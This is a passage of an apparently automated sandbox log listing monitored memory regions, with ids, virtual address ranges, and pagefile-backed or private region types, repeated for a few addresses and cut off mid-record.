0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17668 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17669 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17670 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17671 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17672 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17673 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17674 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17675 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17676 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17677 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17678 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17679 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17680 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17681 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17682 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17683 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17684 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17685 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17686 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17687 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17688 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17689 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17690 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17691 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17692 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17693 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17694 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17695 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17696 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17697 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17698 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17699 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17700 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17701 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17702 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17703 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17704 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17705 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 17706 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17707 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17708 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17709 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17710 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17711 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17712 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17713 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17714 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17715 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17716 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17717 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17718 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17719 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17720 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17721 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17722 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17723 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17724 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17725 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17726 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17727 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17728 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17729 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17730 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17731 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17732 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17733 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17734 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17735 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17736 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17737 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17738 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17739 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17740 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17741 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17742 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17743 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17744 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17745 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17746 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17747 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17748 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17749 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 17750 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17751 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17752 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17754 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17755 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 17756 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17757 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17758 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17759 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17760 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17761 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17762 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17763 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17764 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17765 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17766 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17767 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17768 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17769 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17770 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17771 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17772 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17773 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17774 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17775 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17776 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17777 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17778 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17779 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17780 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17781 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17782 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17783 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17784 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17785 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17786 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17787 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17788 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17789 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17790 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17791 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17792 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17793 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17794 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 17795 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17796 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17797 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17798 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17799 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17800 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17801 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17802 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17803 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17804 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17805 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17806 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17807 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17808 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17809 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17810 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17811 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17812 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17813 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17814 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17815 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17816 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17817 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17818 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17819 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17820 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17821 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17822 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17823 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17824 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17825 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17826 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17827 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17828 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17829 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17830 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17831 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17832 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17833 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17834 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17835 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17836 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17837 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17838 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17839 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17840 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17841 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17842 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17843 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17844 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17845 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17846 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17847 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17848 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17849 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17850 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17851 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17852 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17853 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17854 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17855 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17856 start_va 